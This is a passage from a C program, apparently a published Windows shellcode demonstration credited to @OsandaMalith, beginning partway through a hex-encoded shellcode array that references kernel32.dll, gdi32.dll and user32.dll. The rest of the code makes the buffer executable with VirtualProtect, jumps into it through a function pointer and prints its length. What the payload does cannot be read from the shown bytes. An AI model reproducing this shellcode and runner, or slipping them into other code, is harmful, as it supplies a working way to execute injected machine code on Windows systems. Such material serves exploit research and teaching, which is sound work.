"\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f\x5e\x5b\xc9\xc3\x8b\x4d\xfc" 63 | "\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d" 64 | "\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf\x2b\x06\x06\x06\x32\x06\x06" 65 | "\x06\x39\x06\x06\x06\x6b\x65\x72\x6e\x65\x6c\x33\x32\x2e\x64\x6c" 66 | "\x6c\x06\x67\x64\x69\x33\x32\x2e\x64\x6c\x6c\x06\x75\x73\x65\x72" 67 | "\x33\x32\x2e\x64\x6c\x6c\x06"; 68 | 69 | DWORD oldProtect; 70 | 71 | wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode)); 72 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect); 73 | 74 | if (!ret) { 75 | fprintf(stderr, "%s", "Error Occured"); 76 | return EXIT_FAILURE; 77 | } 78 | 79 | ((void(*)(void))shellcode)(); 80 | 81 | VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect); 82 | 83 | return EXIT_SUCCESS; 84 | } 85 | --------------------------------------------------------------------------------